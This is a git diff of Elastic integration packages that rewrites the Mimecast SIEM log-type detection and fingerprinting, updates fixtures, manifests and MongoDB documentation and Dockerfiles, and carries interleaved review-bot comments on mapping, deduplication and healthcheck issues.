"{\"IP\":\"81.2.69.144\",\"Recipient\":\"auser@mimecast.com\",\"Route\":\"Inbound\",\"Sender\":\"from@domain.com\",\"SenderDomain\":\"domain.com\",\"Size\":378368,\"acc\":\"C1A1\",\"datetime\":\"2017-05-23T21:45:21+0100\",\"fileExt\":\"doc\",\"fileMime\":\"application/vnd.ms-office\",\"fileName\":\"1XCOLUMN.PVC\",\"md5\":\"7b52770644da336a9a59141c80807f37\",\"sha1\":\"a27850da9e7adfc8e1a94dabf2509fc9d65ee7e2\",\"sha256\":\"8746bb4b31ab6f03eb0a3b2c62ab7497658f0f85c8e7e82f042f9af0bb876d83\"}", + "outcome": "unknown" + }, + "mimecast": { + "Recipient": "auser@mimecast.com", + "Route": "Inbound", + "acc": "C1A1", + "log_type": "attachment-protect" + }, + "source": { + "domain": "domain.com", + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "tags": [ + "preserve_original_event" + ] + } + ] +} \ No newline at end of file diff --git a/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-logs.log-expected.json b/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-logs.log-expected.json index c64dd64c205..004bfec9880 100644 --- a/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-logs.log-expected.json +++ b/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-logs.log-expected.json @@ -382,7 +382,7 @@ }, "mimecast": { "acc": "C46A75", - "log_type": "ttp_url", + "log_type": "url-protect", "urlCategory": "Phishing & Fraud" }, "source": { @@ -455,7 +455,7 @@ }, "SpamScore": 1, "acc": "MRK435457623", - "log_type": "a7bebfbb-f4fd-4247-912e-820ace186108" + "log_type": "receipt" }, "source": { "as": { 
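Review bot: The new fixture pins `"source": { "domain": "false", "ip": "0.0.0.0" }` for the impersonation-protect event (`"Action":"Hold"`), where `"false"` is the boolean `NewDomain` flag arriving in ECS `source.domain` through the `mimecast.NewDomain` → `source.domain` rename that sits as unchanged context in the default.yml hunk further down; committing this expected value locks in a mapping bug that will pollute any detection rule or dashboard keyed on `source.domain`. Keep the flag under `mimecast.NewDomain` (declared as a keyword in fields/field.yml alongside the other impersonation flags the README field table already lists, such as `mimecast.ReplyMismatch`) and regenerate this file rather than asserting the wrong value.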
diff --git a/packages/mimecast/data_stream/siem_logs/elasticsearch/ingest_pipeline/default.yml b/packages/mimecast/data_stream/siem_logs/elasticsearch/ingest_pipeline/default.yml
index 60115cbf55e..385b312279e 100644
--- a/packages/mimecast/data_stream/siem_logs/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/mimecast/data_stream/siem_logs/elasticsearch/ingest_pipeline/default.yml
@@ -16,12 +16,6 @@ processors:
 target_field: mimecast
 - drop:
 if: ctx?.mimecast?.datetime == null
- - fingerprint:
- fields:
- - mimecast.MsgId
- - mimecast.datetime
- target_field: "_id"
- ignore_missing: true
 - date:
 description: Use 'mimecast.datetime' as the '@timestamp'
@@ -30,6 +24,189 @@ processors:
 formats:
 - yyyy-MM-dd'T'HH:mm:ssZ
+ ### NOTE LOG TYPE
+ - script:
+ lang: painless
+ params:
+ definite_positive:
+ action: receipt
+ attempt: delivery
+ attnames: process
+ customerip: avlog
+ customname: impersonation-protect
+ customthreatdictionary: impersonation-protect
+ definition: impersonation-protect
+ delivered: delivery
+ err: delivery
+ error: receipt
+ filename: attachment-protect
+ hits: impersonation-protect
+ hld: process
+ internalname: impersonation-protect
+ ipinternalname: process
+ ipnewdomain: process
+ ipreplymismatch: process
+ ipsimilardomain: process
+ ipthreaddict: process
+ latency: delivery
+ mimecastip: avlog
+ msgsize: process
+ newdomain: impersonation-protect
+ reason: url-protect
+ receiptack: delivery
+ replymismatch: impersonation-protect
+ rcptacttype: jrnl
+ scanresultinfo: internal-email-protect
+ senderdomaininternal: avlog
+ similarcustomexternaldomain: impersonation-protect
+ similarinternaldomain: impersonation-protect
+ similarmimecastexternaldomain: impersonation-protect
+ snt: delivery
+ spaminfo: receipt
+ spamlimit: receipt
+ spamprocessingdetail: receipt
+ spamscore: receipt
+ taggedexternal: impersonation-protect
+ taggedmalicious: impersonation-protect
+ threatdictionary: impersonation-protect
+ usetls: delivery
+ negative:
+ acode: [avlog, url-protect, attachment-protect]
+ act: [delivery, avlog, spam, internal-email-protect, impersonation-protect, url-protect, attachment-protect, jrnl]
+ attcnt: [receipt, avlog, spam, internal-email-protect, impersonation-protect, url-protect, attachment-protect, jrnl]
+ attsize: [receipt, avlog, spam, internal-email-protect, impersonation-protect, url-protect, attachment-protect, jrnl]
+ cphr: [process,avlog, spam, internal-email-protect, impersonation-protect, url-protect, attachment-protect, jrnl]
+ dir: [process, avlog, spam, internal-email-protect, impersonation-protect, url-protect, attachment-protect]
+ fileext: [receipt, process, delivery, spam, internal-email-protect, impersonation-protect, url-protect, jrnl]
+ filemime: [receipt, process, delivery, spam, internal-email-protect, impersonation-protect, url-protect, jrnl]
+ headerfrom: [process, delivery, avlog, internal-email-protect, impersonation-protect, url-protect, attachment-protect, jrnl]
+ ip: [process, spam, internal-email-protect, url-protect, jrnl]
+ md5: [receipt, process, delivery, spam, internal-email-protect, impersonation-protect, url-protect, jrnl]
+ rcpt: [process, avlog, spam, internal-email-protect, impersonation-protect, url-protect, attachment-protect]
+ recipient: [receipt, process, delivery, jrnl]
+ rejcode: [process, avlog, spam, internal-email-protect, impersonation-protect, url-protect, attachment-protect, jrnl]
+ rejinfo: [process, avlog, spam, internal-email-protect, impersonation-protect, url-protect, attachment-protect, jrnl]
+ rejtype: [process, avlog, spam, internal-email-protect, impersonation-protect, url-protect, attachment-protect, jrnl]
+ route: [receipt, process, jrnl]
+ senderdomain: [receipt, process, delivery, internal-email-protect, impersonation-protect, jrnl]
+ sha1: [receipt, process, delivery, spam, internal-email-protect, impersonation-protect, url-protect, jrnl]
+ sha256: [receipt, process, delivery, spam, internal-email-protect, impersonation-protect, url-protect, jrnl]
+ size: [receipt, process, delivery, spam, internal-email-protect, impersonation-protect, url-protect, jrnl]
+ sourceip: [receipt, process, delivery, avlog, internal-email-protect, impersonation-protect, attachment-protect, jrnl]
+ tlsver: [process, avlog, spam, internal-email-protect, impersonation-protect, url-protect, attachment-protect, jrnl]
+ url: [receipt, process, delivery, avlog, spam, impersonation-protect, attachment-protect, jrnl]
+ urlcategory: [receipt, process, delivery, avlog, spam, impersonation-protect, attachment-protect, jrnl]
+ virus: [process, delivery, spam, internal-email-protect, impersonation-protect, url-protect, attachment-protect, jrnl]
+ positive:
+ acode: [receipt, process, delivery, spam, internal-email-protect, impersonation-protect, jrnl]
+ act: [receipt, process]
+ attcnt: [process, delivery]
+ attsize: [process, delivery]
+ cphr: [receipt, delivery]
+ dir: [receipt, delivery, jrnl]
+ fileext: [avlog, attachment-protect]
+ filemime: [avlog, attachment-protect]
+ headerfrom: [receipt, spam]
+ ip: [receipt, delivery, avlog, impersonation-protect, attachment-protect]
+ md5: [avlog, attachment-protect]
+ rcpt: [receipt, delivery, jrnl]
+ recipient: [avlog, spam, internal-email-protect, impersonation-protect, url-protect, attachment-protect]
+ rejcode: [receipt, delivery]
+ rejinfo: [receipt, delivery]
+ rejtype: [receipt, delivery]
+ route: [delivery, avlog, spam, internal-email-protect, impersonation-protect, url-protect, attachment-protect]
+ senderdomain: [avlog, spam, url-protect, attachment-protect]
+ sha1: [avlog, attachment-protect]
+ sha256: [avlog, attachment-protect]
+ size: [avlog, attachment-protect]
+ sourceip: [spam, url-protect]
+ tlsver: [receipt, delivery]
+ url: [internal-email-protect, url-protect]
+ urlcategory: [internal-email-protect, url-protect]
+ virus: [receipt, avlog]
+ candidates:
+ receipt: 0
+ process: 0
+ delivery: 0
+ jrnl: 0
+ avlog: 0
+ spam: 0
+ internal-email-protect: 0
+ impersonation-protect: 0
+ url-protect: 0
+ attachment-protect: 0
+ if: ctx.mimecast instanceof Map
+ source: |
+ // Canonicalise keys to lowercase. If this causes issues in future
+ // because case becomes significant, this table space optimisation
+ // will need to be reverted.
+ def keys = new HashSet();
+ for (def k: ctx.mimecast.keySet()) {
+ keys.add(k.toLowerCase());
+ }
+ for (def k: keys) {
+ def typ = params.definite_positive.get(k);
+ if (typ != null) {
+ // We have a definitive known log_type.
+ ctx.mimecast.log_type = typ;
+ return;
+ }
+ }
+ def score = params.candidates.clone();
+ for (def k: keys) {
+ def typ = params.negative.get(k);
+ if (typ == null) {
+ continue;
+ }
+ for (String e: typ) {
+ score.remove(e);
+ }
+ }
+ if (score.size() == 1) {
+ // We have removed all but one of the candidates.
+ ctx.mimecast.log_type = score.keySet().toArray()[0];
+ return;
+ }
+ // Find best remaining and list all co-equal winners.
+ int max = 0;
+ for (def k: keys) {
+ def typ = params.positive.get(k);
+ if (typ == null) {
+ continue;
+ }
+ for (String e: typ) {
+ def s = score.get(e);
+ if (s == null) {
+ continue;
+ }
+ s++;
+ if (s > max) {
+ max = s;
+ }
+ score.put(e, s);
+ }
+ }
+ for (def e: score.entrySet()) {
+ if (e.getValue() < max) {
+ score.remove(e.getKey());
+ }
+ }
+ ctx.mimecast.log_type = score.keySet();
+
+ - fingerprint:
+ fields:
+ - mimecast.MsgId
+ - mimecast.aCode
+ - mimecast.datetime
+ - mimecast.Sender
+ - mimecast.Rcpt
+ - mimecast.Attempt
+ - mimecast.log_type
+ - mimecast.sha256
+ - mimecast.url
+ target_field: "_id"
+ ignore_missing: true
+
 ### RECEIPT LOGS
 - rename:
 field: mimecast.aCode
@@ -94,6 +271,7 @@ processors:
 field: mimecast.TlsVer
 target_field: tls.version
 ignore_missing: true
+
 ### PROCESS LOGS
 - rename:
 field: mimecast.AttSize
@@ -107,7 +285,8 @@ processors:
 field: mimecast.Hld
 target_field: event.reason
 ignore_missing: true
- ### DELIVERY LOGS
+
+ ### DELIVERY LOGS
 - rename:
 field: mimecast.Err
 target_field: error.message
@@ -124,7 +303,8 @@ processors:
 field: tls.established
 value: false
 if: 'ctx.tls?.established instanceof String && ctx.tls.established.toLowerCase() == "no"'
- ### AV LOGS
+
+ ### AV LOGS
 - rename:
 field: mimecast.fileExt
 target_field: email.attachments.file.extension
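Review bot: The `_id` fingerprint added at the end of the script hunk keys on `mimecast.Rcpt` but not on `mimecast.Recipient` or lowercase `mimecast.recipient`, even though the avlog, spam, internal-email-protect, impersonation-protect, url-protect and attachment-protect records in this change carry the recipient under those names (see the `recipient:` row of `positive`). If Mimecast emits one such record per recipient of a message, which seems likely but is not shown here, those records share MsgId, aCode, datetime and Sender and would collapse to a single `_id`, silently dropping events from the audit trail; add `- mimecast.Recipient` and `- mimecast.recipient` to the `fields` list. The `definite_positive` pass also returns on the first hit while iterating a `HashSet`, yet the table lets one record match two types: the impersonation-protect test event carries both `Action` (→ `receipt`) and `CustomName` (→ `impersonation-protect`), so the expected `impersonation-protect` result rests on set iteration order rather than on the data, and because lowercasing also merges it with the url-protect `action` key, `action: receipt` should come out of `definite_positive` (or the pass should collect every hit and treat a conflict as unresolved). Lastly, `score.remove(e.getKey())` inside `for (def e: score.entrySet())` removes during iteration over what `clone()` presumably returns as a HashMap and would throw ConcurrentModificationException on the tie path, which none of the expected files exercise; `score.entrySet().removeIf(e -> e.getValue() < max);` avoids it, and note that the same tie path leaves `log_type` as a Set rather than a single string.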
@@ -162,17 +342,20 @@ processors:
 field: mimecast.fileName
 target_field: email.attachments.file.name
 ignore_missing: true
- ### SPAM EVENT THREAD LOGS
+
+ ### SPAM EVENT THREAD LOGS
 - rename:
 field: mimecast.SourceIP
 target_field: source.ip
 ignore_missing: true
- ### SIEM Email Protect Logs
+
+ ### SIEM Email Protect Logs
 - rename:
 field: mimecast.URL
 target_field: url.full
 ignore_missing: true
- ### SIEM Impersonation logs
+
+ ### SIEM Impersonation logs
 - rename:
 field: mimecast.Action
 target_field: event.action
@@ -185,7 +368,8 @@ processors:
 field: mimecast.NewDomain
 target_field: source.domain
 ignore_missing: true
- ### SIEM TTP Url Logs
+
+ ### SIEM TTP Url Logs
 - rename:
 field: mimecast.reason
 target_field: event.reason
@@ -224,33 +408,6 @@ processors:
 field: mimecast.action
 target_field: event.action
 ignore_missing: true
- - dissect:
- field: mimecast.Content-Disposition
- pattern: "%{?drop->}=\"%{mimecast.log_type}.%{?drop->}"
- ignore_missing: true
- - split:
- field: mimecast.log_type
- separator: "_"
- target_field: mimecast.log_type_parts
- if: 'ctx?.mimecast?.log_type != null'
- - set:
- field: mimecast.log_type_part1
- copy_from: mimecast.log_type_parts.0
- if: 'ctx?.mimecast?.log_type_parts instanceof List && ctx.mimecast.log_type_parts.size() > 0'
- - set:
- field: mimecast.log_type_part2
- copy_from: mimecast.log_type_parts.1
- if: 'ctx?.mimecast?.log_type_parts instanceof List && ctx.mimecast.log_type_parts.size() > 1'
- - set:
- field: mimecast.log_type
- value: "{{mimecast.log_type_part1}}"
- if: 'ctx?.mimecast?.log_type_part1 != "ttp"'
- ignore_failure: true
- - set:
- field: mimecast.log_type
- value: "{{mimecast.log_type_part1}}_{{mimecast.log_type_part2}}"
- if: 'ctx?.mimecast?.log_type_part1 =="ttp" && ctx?.mimecast?.log_type_part2 != null'
- ignore_failure: true
 - set:
 field: event.created
 value: "{{mimecast.datetime}}"
@@ -270,15 +427,15 @@ processors:
 - set:
 field: event.outcome
 value: "success"
- if: 'ctx?.event?.outcome ==true'
+ if: ctx?.event?.outcome == true
 - set:
 field: event.outcome
 value: "failure"
- if: 'ctx?.event?.outcome ==false'
+ if: ctx?.event?.outcome == false
 - set:
 field: event.outcome
 value: "unknown"
- if: 'ctx?.event?.outcome ==null'
+ if: ctx?.event?.outcome == null
 - lowercase:
 field: email.direction
 ignore_missing: true
@@ -349,7 +506,6 @@ processors:
 field: event.original
 if: "ctx?.tags == null || !(ctx.tags.contains('preserve_original_event'))"
 ignore_failure: true
- ###
 # Error handling
 on_failure:
diff --git a/packages/mimecast/data_stream/siem_logs/fields/field.yml b/packages/mimecast/data_stream/siem_logs/fields/field.yml
index acd94e5297d..f1df23f755f 100644
--- a/packages/mimecast/data_stream/siem_logs/fields/field.yml
+++ b/packages/mimecast/data_stream/siem_logs/fields/field.yml
@@ -73,10 +73,13 @@
 description: The source IP is one of the accounts authorised IPs or one of the authorised IPs belonging to an Umbrella Account, if the Account uses an Umbrella Account.
 - name: MimecastIP
 type: keyword
- description: The source IP is one of the Mimecast' IPs e.g. Mimecast Personal Portal.
+ description: The source IP is one of the Mimecast' IPs e.g. Mimecast Personal Portal.
 - name: SenderDomainInternal
 type: keyword
 description: The sender domain is a registered internal domain.
+ - name: Recipient
+ type: keyword
+ description: The recipient of the original message.
 ### Spam Event Thread Logs
 - name: ScanResultInfo
 type: keyword
diff --git a/packages/mimecast/data_stream/siem_logs/sample_event.json b/packages/mimecast/data_stream/siem_logs/sample_event.json
index f0664684e4c..f9c42d2e049 100644
--- a/packages/mimecast/data_stream/siem_logs/sample_event.json
+++ b/packages/mimecast/data_stream/siem_logs/sample_event.json
@@ -1,11 +1,11 @@ { "@timestamp": "2021-11-12T12:15:46.000Z", "agent": { - "ephemeral_id": "c6e5221f-b305-4a75-acb4-7a43547a1e6d", - "id": "c0ee214c-57e5-4a60-80ba-e4dc247eb02e", + "ephemeral_id": "9e414d8d-fe0d-4db1-a95f-aed984c0eef9", + "id": "a26821e0-e36a-4513-a137-0df112893aba", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.0" + "version": "8.12.1" }, "data_stream": { "dataset": "mimecast.siem_logs", @@ -16,9 +16,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "c0ee214c-57e5-4a60-80ba-e4dc247eb02e", + "id": "a26821e0-e36a-4513-a137-0df112893aba", "snapshot": false, - "version": "8.9.0" + "version": "8.12.1" }, "email": { "direction": "internal", @@ -38,7 +38,7 @@ "agent_id_status": "verified", "created": "2021-11-12T12:15:46+0000", "dataset": "mimecast.siem_logs", - "ingested": "2023-07-27T14:59:24Z", + "ingested": "2024-04-07T21:50:35Z", "original": "{\"Content-Disposition\":\"attachment; filename=\\\"jrnl_20211018093329655.json\\\"\",\"Dir\":\"Internal\",\"Rcpt\":\"o365_service_account@example.com\",\"RcptActType\":\"Jnl\",\"RcptHdrType\":\"Unknown\",\"Sender\":\"johndoe@example.com\",\"aCode\":\"fjihpfEgM_iRwemxhe3t_w\",\"acc\":\"ABC123\",\"datetime\":\"2021-11-12T12:15:46+0000\"}", "outcome": "unknown" }, @@ -56,4 +56,4 @@ "forwarded", "mimecast-siem-logs" ] -} +} \ No newline at end of file diff --git a/packages/mimecast/data_stream/threat_intel_malware_customer/sample_event.json b/packages/mimecast/data_stream/threat_intel_malware_customer/sample_event.json index e07292f5b1e..a4bc0bc1e75 100644 --- a/packages/mimecast/data_stream/threat_intel_malware_customer/sample_event.json +++ b/packages/mimecast/data_stream/threat_intel_malware_customer/sample_event.json @@ -68,4 +68,4 @@ "type": "file" } } -} +} \ No newline at end of file diff --git a/packages/mimecast/data_stream/threat_intel_malware_grid/sample_event.json b/packages/mimecast/data_stream/threat_intel_malware_grid/sample_event.json index 4936ab332e8..f630ce7ac4d 100644 
--- a/packages/mimecast/data_stream/threat_intel_malware_grid/sample_event.json +++ b/packages/mimecast/data_stream/threat_intel_malware_grid/sample_event.json @@ -68,4 +68,4 @@ "type": "file" } } -} +} \ No newline at end of file diff --git a/packages/mimecast/data_stream/ttp_ap_logs/sample_event.json b/packages/mimecast/data_stream/ttp_ap_logs/sample_event.json index bdd387dd722..3aaa8994cf6 100644 --- a/packages/mimecast/data_stream/ttp_ap_logs/sample_event.json +++ b/packages/mimecast/data_stream/ttp_ap_logs/sample_event.json @@ -73,4 +73,4 @@ "forwarded", "mimecast-ttp-ap" ] -} +} \ No newline at end of file diff --git a/packages/mimecast/data_stream/ttp_ip_logs/sample_event.json b/packages/mimecast/data_stream/ttp_ip_logs/sample_event.json index 4aa21c40477..8712f01e6bd 100644 --- a/packages/mimecast/data_stream/ttp_ip_logs/sample_event.json +++ b/packages/mimecast/data_stream/ttp_ip_logs/sample_event.json @@ -78,4 +78,4 @@ "forwarded", "mimecast-ttp-ip" ] -} +} \ No newline at end of file diff --git a/packages/mimecast/data_stream/ttp_url_logs/sample_event.json b/packages/mimecast/data_stream/ttp_url_logs/sample_event.json index 6818316186b..72a0159f3f7 100644 --- a/packages/mimecast/data_stream/ttp_url_logs/sample_event.json +++ b/packages/mimecast/data_stream/ttp_url_logs/sample_event.json @@ -85,4 +85,4 @@ "johndoe@example.com" ] } -} +} \ No newline at end of file diff --git a/packages/mimecast/docs/README.md b/packages/mimecast/docs/README.md index 99d6ed8d6fd..00dcd52b0c5 100644 --- a/packages/mimecast/docs/README.md +++ b/packages/mimecast/docs/README.md 
@@ -28,11 +28,11 @@ An example event for `archive_search` looks as following: { "@timestamp": "2021-03-18T18:35:49.000Z", "agent": { - "ephemeral_id": "ef42d9ea-67ec-4494-bad4-9d47b9ed68d2", - "id": "f81bb806-77be-4e89-9f08-d426b37fd611", + "ephemeral_id": "33b422bb-ff57-4039-80c8-23c64e5f54d7", + "id": "5e5700e6-bb04-40f9-b6fc-e5adb94ec6b5", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.8.2" + "version": "8.12.1" }, "data_stream": { "dataset": "mimecast.archive_search_logs", @@ -87,7 +87,6 @@ An example event for `archive_search` looks as following: "name": "admin_dhamilton" } } - ``` **Exported fields** @@ -217,7 +216,6 @@ An example event for `audit_events` looks as following: "name": "johndoe" } } - ``` **Exported fields** @@ -372,7 +370,6 @@ An example event for `dlp` looks as following: "mimecast-dlp-logs" ] } - ``` **Exported fields** @@ -444,11 +441,11 @@ An example event for `siem` looks as following: { "@timestamp": "2021-11-12T12:15:46.000Z", "agent": { - "ephemeral_id": "c6e5221f-b305-4a75-acb4-7a43547a1e6d", - "id": "c0ee214c-57e5-4a60-80ba-e4dc247eb02e", + "ephemeral_id": "9e414d8d-fe0d-4db1-a95f-aed984c0eef9", + "id": "a26821e0-e36a-4513-a137-0df112893aba", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.0" + "version": "8.12.1" }, "data_stream": { "dataset": "mimecast.siem_logs", @@ -459,9 +456,9 @@ An example event for `siem` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "c0ee214c-57e5-4a60-80ba-e4dc247eb02e", + "id": "a26821e0-e36a-4513-a137-0df112893aba", "snapshot": false, - "version": "8.9.0" + "version": "8.12.1" }, "email": { "direction": "internal", 
@@ -481,7 +478,7 @@ An example event for `siem` looks as following: "agent_id_status": "verified", "created": "2021-11-12T12:15:46+0000", "dataset": "mimecast.siem_logs", - "ingested": "2023-07-27T14:59:24Z", + "ingested": "2024-04-07T21:50:35Z", "original": "{\"Content-Disposition\":\"attachment; filename=\\\"jrnl_20211018093329655.json\\\"\",\"Dir\":\"Internal\",\"Rcpt\":\"o365_service_account@example.com\",\"RcptActType\":\"Jnl\",\"RcptHdrType\":\"Unknown\",\"Sender\":\"johndoe@example.com\",\"aCode\":\"fjihpfEgM_iRwemxhe3t_w\",\"acc\":\"ABC123\",\"datetime\":\"2021-11-12T12:15:46+0000\"}", "outcome": "unknown" }, @@ -500,7 +497,6 @@ An example event for `siem` looks as following: "mimecast-siem-logs" ] } - ``` **Exported fields** 
@@ -583,12 +579,13 @@ An example event for `siem` looks as following: | mimecast.IPThreadDict | For emails subject to Targeted Threat Protection - Impersonation Protect, if the content of the email was detected to contain words in the Mimecast threat dictionary. | keyword | | mimecast.InternalName | The email was detected to be from an internal user name. | keyword | | mimecast.Latency | The time in milliseconds that the delivery attempt took. | long | -| mimecast.MimecastIP | The source IP is one of the Mimecast' IPs e.g. Mimecast Personal Portal. | keyword | +| mimecast.MimecastIP | The source IP is one of the Mimecast' IPs e.g. Mimecast Personal Portal. | keyword | | mimecast.MsgId | The internet message id of the email. | keyword | | mimecast.MsgSize | The total size of the email. | long | | mimecast.RcptActType | Action after reception. | keyword | | mimecast.RcptHdrType | Type of the receipt header. | keyword | | mimecast.ReceiptAck | The receipt acknowledgment message received by Mimecast from the receiving mail server. | keyword | +| mimecast.Recipient | The recipient of the original message. | keyword | | mimecast.ReplyMismatch | The reply address does not correspond to the senders address. | keyword | | mimecast.Route | Email route. | keyword | | mimecast.ScanResultInfo | The reason that the click was blocked. | keyword | @@ -715,7 +712,6 @@ An example event for `threat_intel_malware_customer` looks as following: } } } - ``` **Exported fields** @@ -872,7 +868,6 @@ An example event for `threat_intel_malware_grid` looks as following: } } } - ``` **Exported fields** @@ -1037,7 +1032,6 @@ An example event for `ttp_ap` looks as following: "mimecast-ttp-ap" ] } - ``` **Exported fields** @@ -1204,7 +1198,6 @@ An example event for `ttp_ip` looks as following: "mimecast-ttp-ip" ] } - ``` **Exported fields** @@ -1386,7 +1379,6 @@ An example event for `ttp_url` looks as following: ] } } - ``` **Exported fields** 
diff --git a/packages/mimecast/manifest.yml b/packages/mimecast/manifest.yml index 0693d3bafc3..0b02efc7ae5 100644 --- a/packages/mimecast/manifest.yml +++ b/packages/mimecast/manifest.yml @@ -1,14 +1,14 @@ # -format_version: "3.0.0" +format_version: "3.0.2" name: mimecast title: "Mimecast" -version: "1.22.1" +version: "1.24.0" description: Collect logs from Mimecast with Elastic Agent. type: integration categories: ["security", "email_security"] conditions: kibana: - version: "^8.7.1" + version: "^8.12.0" screenshots: - src: /img/mimecast.png title: Sample screenshot @@ -43,6 +43,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: app_id type: password title: Application ID @@ -50,6 +51,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: access_key type: password title: Access Key @@ -57,6 +59,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: secret_key type: password title: Secret Key @@ -64,6 +67,7 @@ policy_templates: multi: false required: true show_user: true + secret: true owner: github: elastic/security-service-integrations type: partner diff --git a/packages/modsecurity/changelog.yml b/packages/modsecurity/changelog.yml index 7a6d6d1a156..fc1c67fb45f 100644 --- a/packages/modsecurity/changelog.yml +++ b/packages/modsecurity/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.18.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: "1.17.2" changes: - description: Changed owners diff --git a/packages/modsecurity/manifest.yml b/packages/modsecurity/manifest.yml index 885f760a10d..19380866fc9 100644 --- a/packages/modsecurity/manifest.yml +++ b/packages/modsecurity/manifest.yml 
@@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: modsecurity title: "ModSecurity Audit" -version: "1.17.2" +version: "1.18.0" description: Collect logs from ModSecurity with Elastic Agent type: integration categories: diff --git a/packages/mongodb/_dev/build/docs/README.md b/packages/mongodb/_dev/build/docs/README.md index 5055fbf4f72..d82e8a6351c 100644 --- a/packages/mongodb/_dev/build/docs/README.md +++ b/packages/mongodb/_dev/build/docs/README.md 
@@ -2,6 +2,35 @@ This integration is used to fetch logs and metrics from [MongoDB](https://www.mongodb.com/). +## Configuration Notes + +When configuring the `hosts` option, MongoDB URIs must adhere to the following formats: + +- Simple: `mongodb://[user:pass@]host[:port][?options]` +- Complex: `mongodb://[username:password@]host1[:port1][,...hostN[:portN]][/[defaultauthdb][?options]]` + +Examples of URIs can vary from simple to complex: + +- Simple: `localhost` +- Complex: `mongodb://myuser:mypass@localhost:40001", "otherhost:40001` + +Additional supported URI examples include: + +- Replica set: `mongodb://localhost:27017,localhost:27022,localhost:27023/?replicaSet=dbrs` +- Direct connection: `mongodb://localhost:27017/?directConnection=true` + +When using the `directConnection=true` parameter in the connection URI, all operations are executed on the specified host. It's important to explicitly include `directConnection=true` in the URI as it won't be automatically added. + +- Authentication: `mongodb://username:password@host:port/authSource=$external?authMechanism=PLAIN` + +When specifying `authMechanism` as PLAIN, it indicates the use of the PLAIN authentication mechanism, which is commonly associated with LDAP. + +`authSource` can be used to specify the name of the database that has the collection with the user credentials. + +In MongoDB, `authSource=$external` is a special authentication database used for authenticating users externally, such as via LDAP. + +The username and password can either be included in the URI or set using the respective configuration options. If included in the URI, these credentials take precedence over any configured username and password configuration options. + ## Compatibility The `log` dataset is tested with logs from versions v3.2.11 and v4.4.4 in 
@@ -28,6 +57,10 @@ db.createUser( } ) ``` +You can use the following command in Mongo shell to authenticate a user against a specific database with the provided username and password (make sure you are using the `admin` db by using `db` command in Mongo shell). +``` +db.auth(user, pass) +``` You can use the following command in Mongo shell to grant the role to an existing user (make sure you are using the `admin` db by using `db` command in diff --git a/packages/mongodb/_dev/deploy/docker/Dockerfile b/packages/mongodb/_dev/deploy/docker/Dockerfile index 05344d72c15..2ee8eef9a5b 100644 --- a/packages/mongodb/_dev/deploy/docker/Dockerfile +++ b/packages/mongodb/_dev/deploy/docker/Dockerfile @@ -1,4 +1,5 @@ -ARG SERVICE_VERSION=${SERVICE_VERSION:-3.4} +ARG SERVICE_VERSION=${SERVICE_VERSION:-5.0} FROM mongo:${SERVICE_VERSION} RUN sed -i "/jessie-updates/d" /etc/apt/sources.list -RUN apt-get update && apt-get install -y netcat \ No newline at end of file +RUN apt-get update && apt-get install -y netcat +HEALTHCHECK --interval=1s --retries=90 CMD nc -z localhost 27017 \ No newline at end of file diff --git a/packages/mongodb/_dev/deploy/docker/creator/Dockerfile b/packages/mongodb/_dev/deploy/docker/creator/Dockerfile index 37672601dcd..d765c619e3a 100644 --- a/packages/mongodb/_dev/deploy/docker/creator/Dockerfile +++ b/packages/mongodb/_dev/deploy/docker/creator/Dockerfile @@ -1,6 +1,5 @@ -ARG SERVICE_VERSION=${SERVICE_VERSION:-3.4} +ARG SERVICE_VERSION=${SERVICE_VERSION:-5.0} FROM mongo:${SERVICE_VERSION} RUN sed -i "/jessie-updates/d" /etc/apt/sources.list RUN apt-get update && apt-get install -y netcat -HEALTHCHECK --interval=1s --retries=90 \ - CMD echo 'db.runCommand({serverStatus:1}).ok' | mongo \ No newline at end of file +HEALTHCHECK --interval=1s --retries=90 CMD nc -z localhost 27017 diff --git a/packages/mongodb/_dev/deploy/docker/docker-compose.yml b/packages/mongodb/_dev/deploy/docker/docker-compose.yml index 6133662f69c..e562fa75540 100644 
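Review bot: The new `HEALTHCHECK --interval=1s --retries=90 CMD nc -z localhost 27017` in both Dockerfiles only proves the TCP port is open, whereas the creator image's previous probe (`echo 'db.runCommand({serverStatus:1}).ok' | mongo`) proved mongod was actually answering commands; mongod listens before it finishes startup, so tests gated on "healthy" can still hit an instance that is not ready. A command-level probe such as `CMD mongosh --quiet --eval 'db.runCommand({ping:1}).ok' | grep -q 1` keeps the stronger guarantee (the `mongo` shell is dropped from 6.0+ images, so `mongosh` is the forward-compatible choice — confirm it is present in the 5.0 image before switching). Separately, `RUN sed -i "/jessie-updates/d" /etc/apt/sources.list` is a leftover from the Debian-jessie-based 3.4 image and is a no-op on `mongo:5.0`; it can go, and the `apt-get install -y netcat` line would benefit from `--no-install-recommends` plus `rm -rf /var/lib/apt/lists/*` in the same layer.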
